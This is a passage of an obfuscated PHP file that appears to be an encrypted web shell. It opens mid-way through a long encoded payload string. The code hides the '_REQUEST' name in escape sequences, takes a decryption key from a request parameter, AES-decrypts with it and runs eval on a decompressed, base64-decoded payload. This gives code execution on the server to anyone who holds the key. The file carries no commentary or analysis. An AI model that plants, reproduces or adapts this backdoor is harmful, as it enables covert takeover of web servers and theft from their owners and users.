BJ7Hst6D8KIKrDu4wj359DPX3v6Y3ntxr30I0Sr4tNIhgmE6e73fcMrjIcBOZBzaIGTRMRQdhS1eG17ZUAENGogGtac8lDl3KVu6U7HgmpCQ2N5ajGr0mYSisUZhRQRu05gy/qH4nMhr5Xo/Nr73no/G6lqVzXCrCWqWvS7vapr6+rXzSV2tb+y2CI71g5fHoB7Hft6qEirDjaOSW2ZyjHpgZsOsrkYCufBGIUlyUsrZquP7YuvfZQprEGcXNsmGUnJrw5Yuio4KEYbDt3P7d931VVdJl+1Gwzs+ndxxMObzitJpWrU2nr5JYe3ZMPZCpwVL6Sg0ttlSr+JzlhCIkZh5gAZhZw3yntBzcjG6oi59v0IttVrrT5ciX8K4Q9BEfBOofA'; function SJXa($WRnfE) { $nXl = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $iuCqL = substr($nXl, 0, 16); $fbFhL = base64_decode($WRnfE); return openssl_decrypt($fbFhL, "AES-256-CBC", $nXl, OPENSSL_RAW_DATA, $iuCqL); } if (SJXa('DjtPn+r4S0yvLCnquPz1fA')){ echo '+X5ss8dprY6GS+MfG+i9nEkTWUR7fsUulch5EG8P6JYpGgztO+SdK0uNcIZWHVnM'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($SJXa)))); ?>